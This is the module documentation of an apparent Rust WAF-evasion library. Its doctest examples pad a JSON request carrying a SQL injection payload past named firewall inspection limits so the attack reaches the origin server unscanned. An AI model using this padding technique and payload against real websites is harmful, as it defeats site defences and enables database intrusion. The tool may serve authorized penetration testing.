1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
//! wafrift-evolution — Genetic algorithm, differential analysis, and WAF-aware advisor.
//!
//! The adaptive feedback loop: detect WAF → analyze differential responses →
//! evolve technique populations → recommend optimal evasion strategies.
//!
//! # Examples
//!
//! Inflate a JSON request body past a WAF's inspection-window cap.
//! Cloudflare and Akamai stop scanning after 8KB; AWS WAF after 16KB.
//! `body_padding::pad` produces a structure-preserving payload that
//! still parses on the origin while pushing the attack tokens past
//! the inspection ceiling:
//!
//! ```
//! use wafrift_evolution::body_padding::{PadOutcome, pad};
//!
//! let body = br#"{"q":"' OR 1=1 --"}"#;
//! let outcome = pad(body, "application/json", 9000);
//! match outcome {
//! PadOutcome::Padded { bytes, added } => {
//! assert!(added >= 9000, "padded by at least 9000 bytes");
//! assert!(bytes.len() > body.len() + 8000);
//! // Still parses as valid JSON — origin sees the same payload.
//! let s = std::str::from_utf8(&bytes).unwrap();
//! assert!(s.contains("' OR 1=1 --"), "attack payload preserved");
//! }
//! other => panic!("expected Padded, got {other:?}"),
//! }
//! ```
//!
//! Opaque content types (binary blobs) are left alone — padding
//! would corrupt them:
//!
//! ```
//! use wafrift_evolution::body_padding::{PadOutcome, pad};
//!
//! let outcome = pad(&[0u8; 64], "application/octet-stream", 9000);
//! assert_eq!(outcome, PadOutcome::SkippedOpaque);
//! ```